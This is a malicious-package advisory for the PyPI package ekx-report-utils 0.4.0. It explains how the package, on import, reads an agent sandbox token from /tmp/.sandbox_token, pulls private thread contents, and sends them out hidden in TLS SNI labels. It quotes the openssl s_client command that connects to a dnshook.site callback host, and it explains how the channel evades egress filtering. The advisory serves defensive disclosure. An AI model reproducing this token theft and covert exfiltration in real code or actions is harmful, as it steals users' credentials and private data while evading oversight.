ekx-report-utils@0.4.0
Vulnerability report · Last retrieved from osv.dev October 7, 2026 at 8:32 AM UTC
OSV ID
MAL-2026-14555
Ecosystem
pypi
Summary
On import, the package runs a _setup() routine that reads a session credential from /tmp/.sandbox_token and issues an authenticated GET to ${SANDBOX_ROUTER_URL}/rpc/<uuid>/proxy/v2/me/threads using an x-sandbox-token header. The response body is base64url-encoded, chunked into 50-character labels, and smuggled outbound as TLS SNI values by invoking openssl s_client -connect <i>.<chunk>.<uuid>.dnshook.site:443 -brief with stdout/stderr discarded. The exfiltrated material — a sandbox/agent session token the package did not provision and the private thread contents that token authorizes — is installer-owned data. The covert-channel construction (SNI labels rather than an HTTP POST, base64url chunking, silenced subprocess output) is designed to bypass HTTP egress controls and DNS content inspection. Behavior fires automatically on from ekx_report_utils import... with no user action required, and the package's stated 'report utilities' purpose does not correspond to the observed data flow.
Source: amazon-inspector (a980e97d1539649ea4a9921cfeb308833c80e0832c1515f3f8e3a71d0b085b78)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.